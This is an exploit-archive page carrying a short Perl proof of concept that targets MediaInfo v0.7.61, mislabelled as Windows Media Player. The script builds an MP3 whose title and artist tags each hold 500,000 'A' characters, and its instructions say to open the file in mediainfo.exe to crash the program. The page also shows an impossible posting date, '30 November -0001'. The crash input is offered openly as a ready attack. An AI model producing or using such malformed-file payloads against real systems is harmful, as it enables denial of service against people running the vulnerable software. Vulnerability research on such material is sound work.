Home / exploitsPDF  

Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit

Posted on 30 November -0001

<HTML><HEAD><TITLE>Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/perl -w # Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit # Tested on Windows 7 / Server 2008 # Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/ # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="3143544b501f54424150435659505c715e465042411f5e4356">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/reza.espargham # # Github : github.com/rezasp # # # # 1 . run perl code : perl reza.pl # 2 . open 1.mp3 by mediainfo.exe # 3 . Crashed ;) use MP3::Tag; $mp3 = MP3::Tag->new('1.mp3'); $mp3->title_set('A' x 500000); $mp3->artist_set('A' x 500000); $mp3->update_tags(); $mp3->close(); </BODY></HTML>

 

TOP